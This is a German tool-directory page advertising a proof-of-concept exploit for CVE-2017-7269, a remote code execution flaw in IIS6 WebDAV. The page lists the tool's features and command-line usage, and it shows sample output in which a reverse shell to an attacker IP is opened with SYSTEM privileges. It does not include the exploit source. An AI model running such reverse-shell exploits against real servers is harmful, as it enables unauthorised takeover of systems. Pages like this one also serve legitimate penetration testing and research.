Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-7269 — ist ein PoC-Tool, das einen Exploit für eine bekannte Schwachstelle in der WebDAV-Komponente von IIS6 demonstriert. | Kitploit
Tools/GitHubGitHub/geniuszly/cve-2017-7269
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

ist ein PoC-Tool, das einen Exploit für eine bekannte Schwachstelle in der WebDAV-Komponente von IIS6 demonstriert.

Repository anzeigen
42vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DE

GenWebDavIISExploit ist ein PoC-Tool, das einen Exploit für eine bekannte Schwachstelle in der WebDAV-Komponente von IIS6 demonstriert. Dieses Tool wurde zu Bildungs- und Forschungszwecken entwickelt, um zu zeigen, wie die Schwachstelle ausgenutzt werden kann, um beliebigen Code auf einem entfernten Server auszuführen.

Haftungsausschluss

Dieses Projekt ist nur für Bildungszwecke bestimmt. Verwenden Sie dieses Tool verantwortungsvoll und nur auf Systemen, die Sie besitzen oder für die Sie ausdrücklich die Erlaubnis zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal.

Funktionen

  • Entfernte Codeausführung auf verwundbaren IIS6-WebDAV-Servern.
  • Dynamische Payload-Generierung mit benutzerdefinierter Reverse-IP und Port.
  • Einfach zu bedienende Befehlszeilenschnittstelle für schnelle Ausnutzung.

Voraussetzungen

  • Python 3.x: Stellen Sie sicher, dass Python 3 auf Ihrem System installiert ist.
  • Netzwerkzugriff: Fähigkeit, eine Verbindung zur IP und zum Port des Zielsystems herzustellen.

Verwendung

Befehlszeilenargumente

  • Target IP: Die IP-Adresse des Ziel-IIS6-WebDAV-Servers.
  • Target Port: Die Portnummer, auf der der WebDAV-Dienst läuft (normalerweise 80).
  • Reverse IP: Ihre IP-Adresse, zu der die Reverse-Shell eine Verbindung herstellen soll.
  • Reverse Port: Die Portnummer auf Ihrem System, um die Reverse-Shell zu empfangen.

Beispiel

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

Verwendungsbeispiel

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

Beispielausgabe

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

Hinweise

  • Stellen Sie sicher, dass ein Listener auf dem angegebenen Reverse-Port läuft, um die eingehende Reverse-Shell zu erfassen.
  • Verwenden Sie dieses Tool nur auf autorisierten Systemen, um auf Schwachstellen zu testen.
Tool herunterladen